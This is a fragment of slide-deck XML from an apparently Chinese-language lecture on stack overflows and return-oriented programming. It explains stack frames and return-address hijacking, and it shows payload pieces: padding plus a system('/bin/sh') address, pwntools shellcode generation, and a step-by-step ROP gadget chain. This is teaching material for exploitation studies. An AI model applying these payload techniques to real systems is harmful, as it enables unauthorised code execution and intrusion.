            <a:endParaRPr lang="en-US" altLang="zh-CN"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leave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retn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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/>
              <a:t>其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>leave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等同于</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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Shape 2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Shape 2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hape 29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Shape 2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Shape 31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Shape 3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Shape 34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Shape 3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Shape 36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Shape 3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Shape 3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Shape 3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/>
              <a:t>由于这个例子中被调用函数没有局部变量，所以汇编代码中没有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr dirty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Shape 4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Shape 4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ei</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>继续回到父函数下一条待执行指令的位置</a:t>
            </a:r>
            <a:endParaRPr dirty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Shape 4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Shape 4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/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指令清空数组</a:t>
            </a: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磁盘中是节，内存中是段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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D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946634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Shape 4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Shape 4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leave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>起到的作用：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr dirty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Shape 50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Shape 5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Shape 53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Shape 5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Shape 55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" name="Shape 5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攻击的目标是获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>需要劫持程序的执行流，也就是控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>寄存器（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>rip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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>也就是通过修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>return address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，控制程序执行流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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>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251326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Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段溢出  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段溢出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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>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305777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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>56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333069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b‘A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’*16 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是从局部变量位置到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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ebp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的距离</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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en-US" altLang="zh-CN" dirty="0" err="1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b‘B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’*4 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指的是覆盖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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ebp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的值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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0x8048522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是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system(‘/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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sh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’)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的调用地址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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>58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92219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b‘A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’*16 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是从局部变量位置到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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ebp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的距离</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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en-US" altLang="zh-CN" dirty="0" err="1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b‘B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’*4 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指的是覆盖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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ebp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的值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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0x8048522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是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system(‘/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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sh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’)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的调用地址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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>59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961735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shellcraft.sh()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利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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pwntools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中自带的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shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将其转换成机器码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ljust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>填充垃圾数据到固定位数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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>61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08093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Code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段是不可写的，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是可写的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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D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662576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shellcraft.sh()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利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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pwntools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中自带的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shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将其转换成机器码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ljust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>填充垃圾数据到固定位数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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>62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138110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攻击效果无法一步到位，需要在程序中找一些不连续的片段链接起来执行所需系统调用功能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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>63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464610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/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存放</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sys_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的系统调用号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存放系统参数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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>64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490523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x86</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过中断进行系统调用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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>65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329527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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>66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749907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把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>gadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>组合起来就能得到具备功能的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>payload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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>67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464301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6" name="Shape 158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7" name="Shape 15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0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>栈中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x0c0c0c0c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x41414141</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>是数据，其他的是地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:sym typeface="Consola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0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>首先执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>，也就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>，所以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>中的值为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern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0x08052318</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>指向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern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pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="0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edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern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 ret;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern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的地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" kern="0"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0" name="Shape 16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1" name="Shape 16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pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，使得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的值等于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x0c0c0c0c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0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>继续执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>，等同于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>的值为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern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0x0809951f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern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，指向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="0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xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="0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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="0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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern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 ret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0"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Shape 163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6" name="Shape 163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kern="0" dirty="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xor %eax, %eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="0" dirty="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清空</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="0" dirty="0" err="1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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" kern="0" dirty="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200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>，到达下一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:endParaRPr dirty="0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Shape 16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2" name="Shape 16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kern="0" dirty="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mov %eax, (%edx); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="0" dirty="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用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="0" dirty="0" err="1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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="0" dirty="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给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="0" dirty="0" err="1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edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="0" dirty="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内地址所指向的位置赋值为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="0" dirty="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32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>位、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>位指的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="646A72"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="646A72"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>一次处理数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="646A72"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>能力是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="646A72"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>还是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>位</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1GB+3GB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2GB+2GB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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D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076458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在栈中写一系列的返回地址，返回地址使得程序在代码段中连续跳转，使得寄存器中包含所需数值，然后调用系统调用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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>72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704082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在栈中写一系列的返回地址，返回地址使得程序在代码段中连续跳转，使得寄存器中包含所需数值，然后调用系统调用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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
